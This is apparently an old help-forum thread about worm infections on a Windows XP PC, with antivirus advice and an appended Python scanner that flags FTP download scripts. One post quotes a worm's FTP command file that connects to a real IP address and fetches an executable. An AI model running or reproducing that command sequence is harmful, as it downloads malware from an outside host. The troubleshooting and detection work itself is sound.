SRES32.EXE

Hi,

I have a customer's PC running XP Home SP1 - brand new box just connected on
Broadband - it's definitely got a virus on it but ZoneAlarm has failed to
block it (apparently) and AVG and various other tools I've run all fail to
pick anything up.

I've had a look at the processes being run at the time and come up with
several:-

sres32.exe
wvsvc.exe
isasv32.exe
command32.exe

According to Symantec the command32 process could be VBS.Nevesc (by
Kaspersky), and all I can find with regard to sres32.exe is on some French and
German sites (and my French and German are not that good!)

Anyone got any ideas?

Cheers,

Vipersman
 
Vipersman said:
I have a customer's PC running XP Home SP1 - brand new box just connected on
Broadband - it's definitely got a virus on it but ZoneAlarm has failed to
block it (apparently) and AVG and various other tools I've run all fail to
pick anything up.

A firewall is only any good at blocking a few viruses; most come in via
infected mail or downloads. And there is no one AV package that
catches *everything*.
I've had a look at the processes being run at the time and come up with
several:-

sres32.exe
wvsvc.exe
isasv32.exe
command32.exe

According to Symantec the command32 process could be VBS.Nevesc (by
Kaspersky), and all I can find with regard to sres32.exe is on some French and
German sites (and my French and German are not that good!)

Anyone got any ideas?

http://rgharper.mvps.org/cleanit.htm for good advice and links to tools.
I would start with Stinger from McAfee, and then get the free trial of
eTrust ezArmor (the firewall component is the Zone Alarm engine which
you already have but the AV component is a very good one). Once
downloaded do the installations and initial runs in Safe mode, to help
avoid a virus inhibiting the AV package as some do. Then in normal boot
make sure you have the very latest signatures and run a scan again.
 
Thanks Alex,

I eventually tracked the problem down to the Bloodhound worm (a file called
command32.exe in c:/windows/system) and the sres32.exe was a process run from
the Spybot worm. The updated definitions from NAV spotted them but couldn't
delete them unless I ran in Safe Mode. The McAfee Stinger didn't find
anything! But I'll be visiting the link you posted for the future.

Cheers

Vipersman
 
i have been having huge problems with wvsvc.exe, after some
investigation i have found the following relationships,
c:\winnt\system32\ in there you will find wvsvc.exe, c.bat and a
"no-name" shortcut or .pif file these are all somehow related and send
out a huge amount of network traffic, the .pif file is the command
file for the wvsvc.exe and reads something like this...
open 194.230.231.145
user a a
binary
GET videosd32.exe
bye
what this is i don't know, but i am running all the latest updated
ad-aware and pestpatrol together with norton and mcafee antivirus.
once in a while i get a warning about an ftpworm, but do full scans and
nothing is found, i have now deleted all the programs and so far no more
problems.


-
wickedfun911
 
wickedfun911 said:
i have been having huge problems with wvsvc.exe, after some
investigation i have found the following relationships,
c:\winnt\system32\ in there you will find wvsvc.exe, c.bat and a
"no-name" shortcut or .pif file these are all somehow related and send
out a huge amount of network traffic, the .pif file is the command
file for the wvsvc.exe and reads something like this...
open 194.230.231.145
user a a
binary
GET videosd32.exe
bye
what this is i don't know, but i am running all the latest updated
ad-aware and pestpatrol together with norton and mcafee antivirus.
once in a while i get a warning about an ftpworm, but do full scans and
nothing is found, i have now deleted all the programs and so far no more
problems.

wvsvc.exe is part of a memory resident worm.
http://uk.trendmicro-europe.com/enterprise/security_info/ve_detail.php?VName=WORM_RBOT.QQ
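
Added example, not part of the original thread: a Python heuristic that flags small files made up of FTP client commands that fetch an executable, like the command file quoted in the posts above. The function names, the extension list, the 4 KB size limit and the 80% verb ratio are assumptions, and the sample is constructed with a documentation address rather than the one in the post.

```python
import re
from pathlib import Path

# FTP client verbs that make up a download script like the one quoted above.
FTP_VERBS = {"open", "user", "binary", "get", "bye", "quit"}
EXE_EXT = re.compile(r"\.(exe|scr|pif|com|bat|dll)$", re.IGNORECASE)
MAX_SCRIPT_BYTES = 4096  # assumption: command scripts are tiny text files


def parse_ftp_script(text):
    """Return {'host', 'fetched'} if text looks like an FTP download script, else None."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if not lines:
        return None
    host, fetched, verbs = None, [], 0
    for ln in lines:
        parts = ln.split()
        verb = parts[0].lower()
        if verb not in FTP_VERBS:
            continue
        verbs += 1
        if verb == "open" and len(parts) > 1:
            host = parts[1]
        elif verb == "get" and len(parts) > 1 and EXE_EXT.search(parts[1]):
            fetched.append(parts[1])
    # Require a remote host, an executable download, and mostly FTP verbs,
    # so ordinary text that happens to contain "open" or "get" is not flagged.
    if host and fetched and verbs / len(lines) >= 0.8:
        return {"host": host, "fetched": fetched}
    return None


def scan_directory(root):
    """Yield (path, finding) for small files under root that parse as FTP download scripts."""
    for path in Path(root).rglob("*"):
        try:
            if not path.is_file() or path.stat().st_size > MAX_SCRIPT_BYTES:
                continue
            # latin-1 never fails to decode, so the extension (.pif, .bat, none) is irrelevant
            text = path.read_bytes().decode("latin-1")
        except OSError:
            continue  # locked or unreadable file: skip rather than abort the sweep
        finding = parse_ftp_script(text)
        if finding:
            yield path, finding


# Constructed sample mirroring the post; 192.0.2.10 is a documentation address.
SAMPLE = "open 192.0.2.10\nuser a a\nbinary\nGET videosd32.exe\nbye\n"

if __name__ == "__main__":
    print(parse_ftp_script(SAMPLE))
```

A hit gives the remote host and the file names to look for on disk and in firewall logs; the check matches on content only, so it does not depend on the dropped file's name or extension.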
 
